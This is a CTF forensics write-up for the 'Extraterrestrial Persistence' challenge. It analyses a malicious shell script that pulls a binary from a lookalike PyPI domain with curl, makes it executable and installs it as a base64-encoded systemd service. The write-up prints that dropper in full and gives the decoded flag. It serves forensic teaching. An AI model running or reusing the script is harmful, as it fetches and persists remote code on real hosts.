2023 Cyber Apocalypse: Extraterrestrial Persistence

#htb #ctf #forensics #malware #persistence #base64

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryForensics
ChallengeExtraterrestrial Persistence

Summary

This challenge involves analyzing a malicious shell script that establishes persistence using systemd service files. The script downloads a malicious binary, sets execution permissions, and registers it as a system service using base64-encoded configuration.

Analysis

The provided shell script:

Terminal window
n=`whoami`
h=`hostname`
path='/usr/local/bin/service'
if [[ "$n" != "pandora" && "$h" != "linux_HQ" ]]; then exit; fi


curl https://files.pypi-install.com/packeges/service -o $path
chmod +x $path


echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service


systemctl enable service.service

Key observations:

  1. Script checks for specific username and hostname (anti-forensics)
  2. Downloads malicious binary to /usr/local/bin/service
  3. Creates systemd service file with base64-encoded configuration
  4. Enables the service to run at startup

Solution

To extract the flag:

  1. Decode the base64-encoded systemd configuration:
Terminal window
echo "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA==" | base64 --decode
  1. Decoded output reveals:
[Unit]
Description=HTB{th3s3_4l13nS_4r3_s00000_b4s1c}
After=network.target network-online.target


[Service]
Type=oneshot
RemainAfterExit=yes


ExecStart=/usr/local/bin/service
ExecStop=/usr/local/bin/service


[Install]
WantedBy=multi-user.target

The flag is embedded in the Description field of the systemd unit file.

Key Takeaways

  • Malicious scripts often use host checks to target specific systems
  • Base64 encoding is not encryption and should not be used for security
  • Systemd service files can establish persistence through auto-start
  • Forensic analysis requires decoding obfuscated payloads
  • Always examine configuration files and scripts for hidden payloads
  • Host-based indicators like username and hostname can identify targets